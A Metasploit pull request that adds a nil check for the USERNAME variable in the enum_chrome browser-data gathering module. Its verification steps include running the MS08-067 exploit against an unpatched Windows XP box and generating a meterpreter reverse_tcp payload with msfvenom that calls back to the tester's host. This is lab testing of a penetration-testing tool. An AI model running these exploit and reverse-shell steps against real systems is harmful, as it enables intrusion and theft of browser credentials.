### PR TITLE
Fix #6569, Add a check for USERNAME env var in enum_chrome post mod

### DIFF
--- a/modules/post/windows/gather/enum_chrome.rb
+++ b/modules/post/windows/gather/enum_chrome.rb
@@ -311,7 +311,7 @@ class Metasploit3 < Msf::Post
     else
       uid = session.sys.config.getuid
       print_status "Running as user '#{uid}'..."
-      usernames << env_vars['USERNAME'].strip
+      usernames << env_vars['USERNAME'].strip if env_vars['USERNAME']
     end
 
     has_sqlite3 = true


### PR DESCRIPTION
## What This Patch Does

This patch fixes an undefined method "strip" for nil class problem in enum_chrome. The root cause is that depending on the context, the USERNAME environment variable might not always be there.

Fix #6569
## Prepare the Following
- [x] A Windows XP test box that is not patched at all.
- [x] Google Chrome on the test box
## Verification
- [x] Start msfconsole
- [x] Do: `use exploit/windows/smb/ms08_067_netapi`
- [x] Do: `set RHOST [IP]`
- [x] Do: `exploit`
- [x] You should get a session
- [x] At the Meterpreter prompt, type: `irb` to enter IRB mode
- [x] At the IRB prompt, do: `session.sys.config.getenvs("USERNAME")`
- [x] You should see that it returns an empty hash.
- [x] Do: `exit` to get back to the Meterpreter prompt.
- [x] At the Meterpreter prompt, do: `run post/windows/gather/enum_chrome`
- [x] You should not see a "NoMethodError" at all.
- [x] Exit the session

---
- [x] Generate a Meterpreter exe: `ruby msfvenom -p windows/meterpreter/reverse_tcp LHOST=[YOUR IP] lport=4444 -f exe -o /tmp/test.exe`
- [x] Start msfconsole
- [x] Do: `use exploit/multi/handler`
- [x] Do: `run` to start a handler for windows/meterpreter/reverse_tcp
- [x] Drag and drop /tmp/test.exe to the Windows XP box. Double click on the EXE and msfconsole should receive a shell.
- [x] At the Meterpreter prompt, type `irb` to enter IRB mode
- [x] At the IRB prompt, do: `session.sys.config.getenvs("USERNAME")`
- [x] You should see that it returns an hash contain the USERNAME variable
- [x] Do: `exit` to get back to the Meterpreter prompt
- [x] At the Meterpreter prompt, do: `run post/windows/gather/enum_chrome`
- [x] You should see that the post module attempts to extract data.
